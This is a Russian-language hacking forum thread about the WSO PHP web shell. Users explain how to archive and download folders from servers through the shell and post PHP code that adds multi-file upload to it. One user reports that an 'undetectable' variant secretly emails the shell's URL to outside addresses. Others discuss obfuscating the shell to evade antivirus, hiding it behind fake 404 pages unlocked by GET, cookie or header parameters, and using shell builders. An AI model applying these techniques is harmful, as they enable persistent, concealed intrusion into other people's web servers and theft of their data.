WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    Мне нужно через WSO2 скачать папку с сервера.
    Я пробовал выделять папку и нажимать compress, чтобы заархивировать папку - но никакого архива рядом с папкой не появляется. Как можно скачать всю папку?
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,450
    Likes Received:
    767
    Reputations:
    834
    а после, в выпадающем меню, где выбирали за архивировать, появляется строчка Paste, ее нужно клацнуть!
     
    _________________________
  3. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    Выбираю compress (пробовал и zip и tar.gz)
    Появляется строка с именем файла:
    wso_20150321_184812.zip
    Жму на кнопку >>
    Потом в выпадающем меню появляется Paste - выбираю, жму на кнопку >>.
    Ничего не происходит, архив не появляется.
     
    #403 Sloneny, 21 Mar 2015
    Last edited: 21 Mar 2015
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,450
    Likes Received:
    767
    Reputations:
    834
    при этой строке, там же где была кнопка compress в выпадающем меню, появляется новая строчка Paste, ее обязательно надо указать, а потом щелкайте по кнопе >>

    [​IMG]
     
    _________________________
    #404 winstrool, 21 Mar 2015
    Last edited: 21 Mar 2015
    magnathorax likes this.
  5. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    38
    Likes Received:
    2
    Reputations:
    0
    Премного благодарен.
     
  6. xavior

    xavior Member

    Joined:
    3 Apr 2011
    Messages:
    8
    Likes Received:
    6
    Reputations:
    1
    Делаем мультиаплоад в шелле. Выложил на Rdot, дублирую также сюда:

    [​IMG]
    [​IMG]

    Правим input аплоада

    HTML:
    <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[]  multiple><input type=submit value='>>'></form><br  ></td>
    Далее строка примерно 522
    PHP:
    case 'uploadFile':
    ...
    .....
    break;
    Заменяем там блок на
    PHP:
    case 'uploadFile':
            if ( 
    is_array($_FILES['f']['tmp_name']) ) {
                    foreach ( 
    $_FILES['f']['tmp_name'] as $i => $tmpName ) {
                            if(!@
    move_uploaded_file($tmpName$_FILES['f']['name'][$i])) {
                                    echo 
    "Can't upload file!";
                            }
                    }
            }
            break;
     
    #406 xavior, 23 Apr 2015
    Last edited: 23 Apr 2015
    M_script, BlueMarine, Law and 3 others like this.
  7. Maser_Montan

    Maser_Montan Banned

    Joined:
    11 Mar 2013
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    написали бы в чем отличия
     
    _________________________
  9. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    310
    Reputations:
    163
    в присутствии бэкдора, пологаю :)
     
    d1kobraz and frank like this.
  10. 6agupa

    6agupa New Member

    Joined:
    8 May 2015
    Messages:
    27
    Likes Received:
    4
    Reputations:
    0
    https://code.google.com/p/wso-web-shell-2-8/

    Уже на Google Code есть. Версия 2.8. Странно, что он ещё в Metasploit не включён.
    А на счёт выкладывания его на GitHub или Google Code, мне кажется, идея здравая. Всё-равно это сто лет как паблик. А пилить вместе всегда веселее.
    Или это противоречит политике GitHub?
     
  11. H@rd

    H@rd Member

    Joined:
    18 May 2015
    Messages:
    27
    Likes Received:
    21
    Reputations:
    1
    Запустил WSO2.8_undetectable.php на локалхосте с SMTP-заглушкой.

    Скриптом отправляется 2 письма на следующие адреса:
    fwrite@live.ca, f3d0s3rv3r@hotmail.com

    X-Sendmail-Cmdline: sendmail.pl -t -i
    To: fwrite@live.ca
    Subject: array localhost/WSO2.8_undetectable.php
    X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code

    localhost/WSO2.8_undetectable.php

    X-Sendmail-Cmdline: sendmail.pl -t -i
    To: f3d0s3rv3r@hotmail.com
    Subject: WebShell http://localhost/WSO2.8_undetectable.php by 127.0.0.1
    X-PHP-Originating-Script: 0:WSO2.8_undetectable.php(2) : regexp code(1) : eval()'d code(4) : eval()'d code(1) : regexp code(1) : eval()'d code(1) : regexp code(1) : eval()'d code(2) : eval()'d code(276) : eval()'d code(1) : eval()'d code

    Bug: localhost/WSO2.8_undetectable.php by 127.0.0.1<br>
     
    M_script, profishell, Swat2k and 4 others like this.
  12. 6agupa

    6agupa New Member

    Joined:
    8 May 2015
    Messages:
    27
    Likes Received:
    4
    Reputations:
    0
    Кто-нибудь вообще криптует/минифицирует/обфусцирует WSO2?
    Есть в этом смысл вообще? Или современные антивирусы имеют интерпретатор PHP?
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,450
    Likes Received:
    767
    Reputations:
    834
    Смысл имеет! У меня к примеру сейчас, есть вариант который не один ав не палит, что позволяет дольше быть незамеченным на хостинге. ручками все делал, хочу свой оббусификатор написать но ручки пока не доходят, вариант на 50% сырой еще.
     
    _________________________
    6agupa and 3ran like this.
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,070
    Likes Received:
    529
    Reputations:
    935
    И что же ты изменил? Испортил дизайн и добавил бесполезную хуйню?
     
    _________________________
    grimnir likes this.
  15. 3ran

    3ran Member

    Joined:
    27 Jul 2012
    Messages:
    59
    Likes Received:
    19
    Reputations:
    5
    Сделай описание что нового ты добавил в эту версию.
     
  16. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,917
    Likes Received:
    755
    Reputations:
    198
    Он ничего не добавил, самое смешное смотреть за историей правок файла. Кстати за основу был взят wso 2.1 этот хакир видимо не знает даже происхождение шелла и что есть 2.5 версия. Во всем виноваты каникулы.

    1)
    Code:
    -/* WSO 2.1 (Web Shell by oRb) */
    +/* WSO 2.2.0 (Web Shell by oRb) */
    2)
    Code:
    -/* WSO 2.2.0 (Web Shell by oRb) */
    +/* WSO 2.2.0 (Web Shell by Pirat) */
    3)
    Code:
    -/* WSO 2.2.0 (Web Shell by Pirat) */
    +/* WSO 2.2.0 (Web Shell by HARD _LINUX) */
    4)
    Code:
    -$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
    +$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
    5)
    Code:
    -$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
    +$auth_pass = "21232f297a57a5a743894a0e4a801fc3";
    PS Для чего была вставлена строка?
     
    _________________________
    #416 b3, 20 Jul 2015
    Last edited: 20 Jul 2015
    YaBtr, 6agupa and yarbabin like this.
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    как по мне, не самый лучший вариант, т. к. вариантов 404 может быть масса. лучше отдавать хедером 404 ошибку, но при каких-либо параметрах в GET отдавать уже веб-шелл
     
    _________________________
    frank and grimnir like this.
  18. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,108
    Likes Received:
    752
    Reputations:
    200
    Отличая идея,что-то не подумал сразу.
     
    _________________________
  19. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,469
    Likes Received:
    716
    Reputations:
    742
    И палить шелл GET-ом, а про cookie, user-agent, accept-language и т.п. уже забыли.
     
    _________________________
  20. dondy

    dondy Member

    Joined:
    5 Jun 2015
    Messages:
    563
    Likes Received:
    61
    Reputations:
    5
    http://kronus.me/cn/wso-builder/1.04/
    понравилась онлайн версия билдера wso
    возник вопрос, чем шифруется wso ?(пункт Запаковать как в 2.5)
    и ещё вопрос, можно ли такой билдер найти? что бы себе на локалхосте делать сборки wso!